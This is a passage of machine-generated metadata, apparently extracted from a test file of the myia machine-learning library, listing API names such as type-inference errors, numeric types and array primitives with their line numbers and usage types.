{"api_name": "common.i64", "line_number": 1195, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1195, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1196, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1196, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1196, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1204, "usage_type": "name"}, {"api_name": "types.SimpleNamespace", "line_number": 1204, "usage_type": "name"}, {"api_name": "myia.dtype.External", "line_number": 1205, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1206, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1212, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1212, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1217, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1217, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1222, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1222, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1230, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1230, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1249, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1249, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.shape", "line_number": 1258, "usage_type": "call"}, {"api_name": "common.ai16", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1254, "usage_type": "name"}, {"api_name": "common.ai16", "line_number": 1255, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1256, "usage_type": "name"}, {"api_name": "common.ai16", "line_number": 1256, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1262, "usage_type": "call"}, {"api_name": "myia.dshape.ClassShape", "line_number": 1262, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1262, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 1263, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1263, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1264, "usage_type": "call"}, {"api_name": "myia.dshape.ListShape", "line_number": 1264, "usage_type": "call"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1264, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.dot", "line_number": 1279, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1273, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1275, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1277, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.distribute", "line_number": 1299, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1282, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1282, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1284, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1284, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1285, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1287, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 
1287, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1288, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 1289, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1290, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1290, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1291, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1293, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1293, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.ai32", "line_number": 1294, "usage_type": "name"}, {"api_name": "common.li32", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1295, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1295, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 1296, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1296, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.distribute", "line_number": 1309, "usage_type": "call"}, {"api_name": "common.ai32", "line_number": 1302, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1307, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.reshape", "line_number": 1321, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1312, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1312, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1313, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1313, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1314, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1315, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1315, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1316, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 1317, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1318, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1318, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1319, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.transpose", "line_number": 1348, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1325, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1325, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1328, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1328, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1331, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1331, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1334, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1334, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1335, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1337, "usage_type": 
"name"}, {"api_name": "common.u64", "line_number": 1337, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1338, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1340, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1340, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1341, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1343, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1343, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1344, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.af16", "line_number": 1345, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1346, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1346, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1346, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1357, "usage_type": "call"}, {"api_name": "common.af32", "line_number": 1351, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1352, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1353, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1353, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1372, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1361, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1362, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1363, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1364, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1365, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1366, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1367, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1367, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1368, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1368, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1379, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1375, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1400, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1383, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1384, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1385, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1386, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1388, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1389, "usage_type": "argument"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1390, "usage_type": "argument"}, {"api_name": "myia.infer.InferenceError", "line_number": 1391, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1393, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1394, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1395, "usage_type": "name"}, 
{"api_name": "myia.infer.InferenceError", "line_number": 1395, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1396, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1396, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_scan", "line_number": 1414, "usage_type": "call"}, {"api_name": "common.u64", "line_number": 1403, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1405, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1405, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1406, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1406, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1406, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1407, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1408, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1409, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 1452, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1419, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1420, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1420, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1421, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1421, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1425, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1425, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1429, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1429, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1429, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1430, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1433, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1433, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1434, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1437, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1437, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1438, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1441, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1441, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.list_reduce", "line_number": 1472, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1457, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1457, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1458, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1458, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1461, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 1461, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 
1461, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1461, "usage_type": "call"}, {"api_name": "common.L", "line_number": 1464, "usage_type": "name"}, {"api_name": "myia.dtype.Array", "line_number": 1464, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1464, "usage_type": "name"}, {"api_name": "myia.dshape.ListShape", "line_number": 1464, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1466, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1481, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1475, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1477, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1477, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1491, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.partial", "line_number": 1492, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1485, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.identity", "line_number": 1503, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1500, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.bool_and", "line_number": 1510, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1506, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1507, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1507, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1507, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1508, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1508, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1508, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.bool_or", "line_number": 1517, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1513, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1514, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1514, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1514, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1515, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1515, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1515, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.switch", "line_number": 1556, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1522, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1522, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1523, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1523, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1524, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1524, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1525, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1525, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1526, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1526, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1531, "usage_type": "name"}, {"api_name": 
"myia.infer.ANYTHING", "line_number": 1531, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1534, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1539, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1542, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1544, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1549, "usage_type": "name"}, {"api_name": "common.Thing", "line_number": 1569, "usage_type": "call"}, {"api_name": "common.Thing", "line_number": 1570, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.switch", "line_number": 1571, "usage_type": "call"}, {"api_name": "common.B", "line_number": 1560, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1560, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_cast", "line_number": 1587, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1577, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1578, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1578, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1579, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1579, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1580, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1580, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1581, "usage_type": "name"}, {"api_name": "myia.dtype.TypeType", "line_number": 1581, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1581, "usage_type": "name"}, {"api_name": "common.f16", "line_number": 1582, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1582, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1582, "usage_type": "name"}, {"api_name": "common.B", "line_number": 1583, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1583, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1583, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_to_array", "line_number": 1596, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1590, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1590, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1591, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1591, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1592, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1593, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1593, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1593, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1594, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_to_scalar", "line_number": 1605, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1599, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1600, "usage_type": "name"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1601, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1602, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1603, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.broadcast_shape", "line_number": 1617, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1609, "usage_type": "name"}, 
{"api_name": "common.u64", "line_number": 1609, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1610, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1610, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1611, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1611, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1612, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1612, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.u64", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1613, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1613, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1614, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1614, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1621, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1621, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1622, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1623, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1623, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1623, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1623, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 1629, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 1629, "usage_type": "attribute"}, {"api_name": "common.F", "line_number": 1631, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1631, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1640, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 1640, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1653, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1653, "usage_type": "name"}, {"api_name": "common.mysum", "line_number": 1672, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1667, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1668, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1668, "usage_type": "name"}, {"api_name": "myia.ir.MultitypeGraph", "line_number": 1675, "usage_type": "call"}, {"api_name": "common.ai64", "line_number": 1678, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.array_map", "line_number": 1685, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1685, "usage_type": "argument"}, {"api_name": "common.af64", "line_number": 1683, "usage_type": "argument"}, {"api_name": "common.ai64", "line_number": 1690, "usage_type": "name"}, {"api_name": "common.af64", "line_number": 1691, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1692, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1692, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1696, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1697, 
"usage_type": "name"}, {"api_name": "common.f64", "line_number": 1710, "usage_type": "name"}, {"api_name": "myia.pipeline.pipeline_function", "line_number": 1707, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1718, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1719, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1719, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1724, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1732, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add.inferred", "line_number": 1733, "usage_type": "attribute"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.F", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1733, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1733, "usage_type": "name"}, {"api_name": "myia.pipeline.pipeline_function", "line_number": 1729, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1745, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1749, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 1753, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1753, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1756, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1756, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 1764, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 1764, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1767, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1778, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1779, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1780, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1780, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1781, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1781, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1782, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1782, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1782, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1783, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1783, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1791, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1792, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1793, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1800, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1801, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1801, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1811, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1812, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 1813, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1826, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1827, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1835, "usage_type": "call"}, {"api_name": "common.T", "line_number": 1835, "usage_type": "argument"}, 
{"api_name": "common.i64", "line_number": 1843, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1844, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1857, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 1857, "usage_type": "argument"}, {"api_name": "myia.prim.py_implementations.hastype", "line_number": 1859, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1859, "usage_type": "argument"}, {"api_name": "common.f16", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1853, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1867, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1867, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1870, "usage_type": "call"}, {"api_name": "common.Point_t", "line_number": 1871, "usage_type": "name"}, {"api_name": "myia.infer.ANYTHING", "line_number": 1871, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1874, "usage_type": "argument"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1874, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1883, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1883, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1886, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1907, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1908, "usage_type": "call"}, {"api_name": "common.Point", "line_number": 1909, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1895, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1895, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1896, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1896, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1899, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1902, "usage_type": "argument"}, {"api_name": "myia.dshape.ClassShape", "line_number": 1903, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 1903, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1912, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1912, "usage_type": "name"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1917, "usage_type": "call"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1918, "usage_type": "call"}, {"api_name": "myia.dtype.Array", "line_number": 1918, "usage_type": "name"}, {"api_name": "myia.dtype.Class", "line_number": 1918, "usage_type": "name"}, {"api_name": "myia.hypermap.HyperMap", "line_number": 1919, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1949, "usage_type": "argument"}, {"api_name": "common.i64", "line_number": 1924, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1925, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1926, "usage_type": "name"}, {"api_name": "common.L", "line_number": 1927, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1927, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1928, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1928, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1928, "usage_type": "name"}, {"api_name": 
